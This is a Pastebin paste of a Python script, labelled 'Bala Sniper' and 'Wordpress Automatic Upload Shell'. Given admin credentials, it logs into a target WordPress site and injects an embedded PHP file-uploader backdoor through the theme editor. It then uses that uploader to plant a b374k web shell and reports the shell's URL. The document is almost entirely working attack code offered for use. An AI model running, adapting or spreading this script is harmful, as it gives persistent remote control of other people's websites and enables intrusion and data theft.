API tools faq
paste
Advertisement
Guest User

py

a guest
Jul 9th, 2017
92
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.57 KB | None | 0 0
raw download clone embed print report
  1. import requests, os, sys, time, random, re
  2. from colorama import Fore, Back, Style
  3. reload(sys)
  4. sys.setdefaultencoding('utf-8')
  5.  
  6. shell_code = '''
  7. <title>Wordpress_project</title>
  8. <?php
  9. echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
  10. echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
  11. if( $_POST['_upl'] == "Upload" ) {
  12. if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Shell Uploaded ! :)<b><br><br>'; }
  13. else { echo '<b>Not uploaded ! </b><br><br>'; }
  14. }
  15. ?>
  16. '''
  17.  
  18. headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0',
  19. 'Accept': '*/*'}
  20.  
  21. def cls():
  22. linux = 'clear'
  23. windows = 'cls'
  24. os.system([linux, windows][os.name == 'nt'])
  25.  
  26.  
  27. def print_logo():
  28. clear = "\x1b[0m"
  29. colors = [36, 32, 34, 35, 31, 37]
  30.  
  31. x = """
  32.  
  33.  
  34. __ __ _
  35. \ \ / / | | Bala Sniper
  36. \ \ /\ / /__ _ __ __| |_ __ _ __ ___ ___ ___
  37. \ \/ \/ / _ \| '__/ _` | '_ \| '__/ _ \/ __/ __|
  38. \ /\ / (_) | | | (_| | |_) | | | __/\__ \__ |
  39. \/ \/ \___/|_| \__,_| .__/|_| \___||___/___/
  40. Version 1.0 | |
  41. |_|
  42. Wordpress Automatic Upload Shell V 1.0
  43. Welcome To Wordpress_project : )
  44. """
  45. for N, line in enumerate(x.split("\n")):
  46. sys.stdout.write("\x1b[1;%dm%s%s\n" % (random.choice(colors), line, clear))
  47. time.sleep(0.05)
  48.  
  49.  
  50.  
  51. cls()
  52. print_logo()
  53.  
  54.  
  55.  
  56.  
  57. def get_WpNoncE():
  58. try:
  59. find = re.findall('<input type="hidden" id="_wpnonce" name="_wpnonce" value="(.*?)"', source)
  60. path = find[0].strip()
  61. return path
  62. except:
  63. pass
  64.  
  65.  
  66. def get_WpFlag():
  67. try:
  68. find = re.findall('<option value="(.*?)" selected="selected">', source)
  69. path = find[0].strip()
  70. return path
  71. except:
  72. pass
  73.  
  74.  
  75. sess = requests.session()
  76. try:
  77. url = sys.argv[1]
  78. except IndexError:
  79. print Fore.YELLOW + ' --------------------------------------------------------------------- '
  80. print Fore.YELLOW + ' [*] ' + Fore.CYAN + Fore.WHITE + ' python Script.py http://site.com'
  81. print(Style.RESET_ALL)
  82. sys.exit()
  83.  
  84.  
  85. username = raw_input(str((Fore.CYAN) + ' Username > ' + (Fore.YELLOW)))
  86. password = raw_input(str((Fore.CYAN) + ' Password > ' + (Fore.YELLOW)))
  87.  
  88. cls()
  89. print_logo()
  90.  
  91. admin_re_page = url + '/wp-admin/'
  92. login_go = url + '/wp-login.php'
  93. post_parm = {'log': username,'pwd': password, 'wp-submit':'Log+In','redirect_to':admin_re_page, 'testcookie':'1'}
  94.  
  95. Get_login = sess.post(login_go, data=post_parm, headers=headers)
  96.  
  97. if '<li id="wp-admin-bar-logout">' in Get_login.text.encode('utf-8'):
  98. ___Get_editor = admin_re_page + 'theme-editor.php?file=search.php#template'
  99. ___Get_edit = admin_re_page + 'theme-editor.php'
  100. Get_source = sess.get(___Get_editor, headers=headers, timeout=5)
  101. source = Get_source.text
  102. _Wp_FlaG = get_WpFlag()
  103. _Wp_NoncE = get_WpNoncE()
  104.  
  105.  
  106. __data = {'_wpnonce':_Wp_NoncE,
  107. '_wp_http_referer':'/wp-admin/theme-editor.php?file=search.php',
  108. 'newcontent': shell_code,
  109. 'action': 'update',
  110. 'file': 'search.php',
  111. 'theme' :_Wp_FlaG,
  112. 'scrollto': '0',
  113. 'docs-list': '',
  114. 'submit': 'Update+File'}
  115.  
  116.  
  117. sess.post(___Get_edit, data=__data, headers=headers)
  118. shell_PaTh = url + "/wp-content/themes/" + _Wp_FlaG + "/search.php"
  119. Check_sHell = sess.get(shell_PaTh, headers=headers)
  120. if 'Wordpress_project' in Check_sHell.text:
  121. __po = {'_upl': 'Upload'}
  122. fil = {'file': open('Access.php', 'rb')}
  123. upload_shell = requests.post(shell_PaTh, data=__po, files=fil)
  124. shell_PaTh_DoNe = url + "/wp-content/themes/" + _Wp_FlaG + '/Access.php'
  125. Got_Shell = requests.get(shell_PaTh_DoNe, timeout=5)
  126. if 'b374k' in Got_Shell.text:
  127. print Fore.YELLOW + ' [+] ' + Fore.CYAN + 'Shell ---> ' + Fore.GREEN + shell_PaTh_DoNe
  128. print(Style.RESET_ALL)
  129. else:
  130. print Fore.YELLOW + ' [+] ' + Fore.CYAN + 'Uploader ---> ' + Fore.GREEN + shell_PaTh
  131. print(Style.RESET_ALL)
  132.  
  133.  
  134. else:
  135. print Fore.YELLOW + ' [-] ' + Fore.CYAN + url + Fore.RED + ' ---> Shell Not Uploaded'
  136. print(Style.RESET_ALL)
  137.  
  138.  
  139.  
  140. else:
  141. print Fore.YELLOW + ' [-] ' + Fore.CYAN + url + Fore.WHITE + ' ---> i cant login :( try again'
  142. print(Style.RESET_ALL)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!